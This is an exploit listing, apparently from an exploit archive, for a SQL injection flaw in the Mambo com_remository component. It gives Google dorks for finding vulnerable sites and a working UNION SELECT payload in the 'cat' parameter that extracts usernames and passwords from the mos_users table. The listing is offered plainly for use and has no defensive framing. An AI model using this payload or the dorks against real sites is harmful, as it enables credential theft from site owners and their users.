Topic : | Mambo Component com_remository SQL Injection Vulnerability
|
ExploitAlert : 3530
Credit : S@BUN
Date : 12.03.2008
Download
Plain text version
 Exploit Code : ##########################################
#
# Mambo Component com_remository SQL Injection Vulnerability
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
####HOME : http://securityreason.com/search/101/c0BidW4=/1/0
#
####MAŻL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORKS 1 : allinurl :"com_remository"
DORKS 2 : allinurl: orderby "=com_remository"cat
#
###########################################
EXPLOIT :
index.php?option=com_remository&Itemid=S@BUN
&func=selectcat&cat=-99999/**/union/**/select/**/0,0,0,0,concat(username,0x
3a,password),0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2/**/from/**/mos_users/*
###########################################
##################S@BUN##################
###########################################
#####hackturkiye.hackturkiye@gmail.com#######
###########################################
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|